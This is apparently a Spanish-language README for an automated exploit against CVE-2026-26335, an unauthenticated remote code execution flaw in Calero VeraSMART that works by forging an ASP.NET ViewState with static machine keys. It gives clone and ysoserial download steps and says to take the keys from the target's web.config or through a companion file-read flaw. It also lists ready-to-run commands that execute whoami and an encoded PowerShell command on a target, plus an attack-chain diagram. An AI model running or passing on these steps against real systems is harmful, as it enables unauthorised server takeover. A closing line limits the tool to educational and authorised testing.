
Exploit automatizado para CVE-2026-26335, una RCE crítica no autenticada en Calero VeraSMART mediante ViewState de ASP.NET falsificado usando claves de máquina estáticas. Incluye descubrimiento de endpoints, generación de payloads y ejecución de comandos.
Mohammed Idrees Banyamer Investigador de Seguridad
CVE‑2026‑26335 es una vulnerabilidad crítica de ejecución remota de código sin autenticación en Calero VeraSMART (anterior a 2022 R1).
La aplicación utiliza claves de máquina ASP.NET estáticas y codificadas compartidas entre instalaciones.
Un atacante con estas claves puede forjar un ViewState ASP.NET malicioso y desencadenar deserialización del lado del servidor → RCE.
Este exploit automatiza:
__VIEWSTATEGENERATORCWE‑321 — Claves criptográficas codificadas
Las implementaciones de VeraSMART reutilizan la misma machineKey de ASP.NET:
<machineKey validationKey="STATIC_KEY"
decryptionKey="STATIC_KEY"
validation="SHA1"
decryption="AES" />
Cualquier atacante con las claves de una instalación puede atacar todas.
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe
Las claves no son públicas. Obténgalas del objetivo:
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config
O mediante la lectura de archivos complementaria:
CVE‑2026‑26333
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v
9.8 — Crítico AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Corregido en VeraSMART 2022 R1:
Soluciones alternativas:
Solo para fines educativos y pruebas autorizadas. Úselo únicamente en sistemas que posea o para los que tenga permiso de evaluación.
Mohammed Idrees Banyamer Investigador de Seguridad
El siguiente diagrama ilustra la cadena de explotación de CVE‑2026‑26335 en Calero VeraSMART, donde las claves de máquina ASP.NET estáticas permiten forjar un ViewState malicioso que conduce a la ejecución remota de código.
flowchart LR
A[Attacker] --> B[Obtain VeraSMART machineKey]
B --> C[Discover ViewState endpoint]
C --> D[Extract __VIEWSTATEGENERATOR]
D --> E[Generate malicious ViewState via ysoserial]
E --> F[Sign payload with machineKey]
F --> G[Send forged POST request]
G --> H[ASP.NET ViewState deserialization]
H --> I[TypeConfuseDelegate gadget]
I --> J[Remote Code Execution on IIS]